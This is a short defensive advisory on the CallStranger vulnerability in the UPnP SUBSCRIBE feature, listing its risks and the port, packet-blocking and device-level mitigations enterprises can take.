Universal Plug and Play (UPnP) protocol.
What you need to know:
A remote, unauthenticated attacker may be able to abuse the UPnP SUBSCRIBE capability to send traffic to arbitrary destinations, leading to amplified DDoS attacks and data exfiltration.
Actions to be taken:
It may take long time for vendors to patch UPnP devices, enterprises should take their own actions. Depending on defense-in-dept approach, enterprises may choose different mitigations.
Internet Facing Devices
- Close UPnP Ports to the Internet if there is no business/technical need.
- Close UPnP Services’ port (different from UDP 1900) to the Internet. To find out these ports check products documentation or use this test tool, a port scanner like Nmap or UPnP Device Spy.
- Block all SUBSCRIBE and NOTIFY HTTP packets in ingress and egress traffic.
- Check logs if anyone used this vulnerability
- Configure DDoS protection device or service to block NOTIFY packets
- Disable UPnP service of IP camera, printer, routers and other devices if it is not a business or technical requirement.
- Check these devices’ Internet access policy (B1)
DMZ & Server Segment
- Do not place unsecured UPnP devices on this network.
- Be careful about media processing servers. Media services may use UPnP. Do (B1) if it does not affect business and technical requirements.
What is the impact of not doing the actions?
If exploited, this may allow attackers to exfiltrate data, launch a denial of service attack or scan ports. Adversaries can take advantage of CallStranger in order to bypass data loss prevention protections and network security devices and ultimately exfiltrate sensitive data. They can also leverage internet-facing devices to perform reflect Transmission Control Protocol (TCP) DDoS attacks as well as to scan ports.